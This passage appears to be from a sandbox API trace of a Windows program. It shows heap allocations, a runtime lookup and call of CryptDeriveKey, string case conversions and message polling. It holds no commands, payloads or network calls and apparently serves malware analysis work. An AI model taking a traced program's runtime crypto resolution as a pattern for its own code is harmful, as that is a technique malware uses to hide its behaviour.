dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0190.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0190.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0190.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0190.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0190.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0190.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0190.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0190.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0190.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0190.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0190.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0190.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0190.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0190.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0190.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0190.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0190.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0190.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0190.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0190.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf) returned 0x24a9dc8 [0190.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24a9dc8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0190.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.575] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0190.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0190.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0190.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0190.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0190.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0190.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0190.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0190.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0190.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.576] CryptDeriveKey (in: hProv=0xaa3868, Algid=0x6601, hBaseData=0xaa58a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58e0) returned 1 [0190.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0190.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0190.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0190.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0190.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0190.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0190.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0190.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0190.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0190.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0190.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0190.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0190.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0190.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0190.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0190.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0190.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0190.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0190.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0190.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0190.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0190.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0190.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0190.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0190.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.580] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0190.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0190.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0190.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0190.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0190.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.581] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.582] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0190.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0190.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0190.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0190.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.582] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0190.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0190.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0190.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0190.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0190.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0190.583] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0190.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0190.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.583] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0190.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0190.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0190.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0190.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0190.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.584] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.584] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.584] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.584] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.584] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.584] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.585] CryptDestroyHash (hHash=0xaa58a0) returned 1 [0190.585] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.585] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.585] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.585] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.585] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.585] 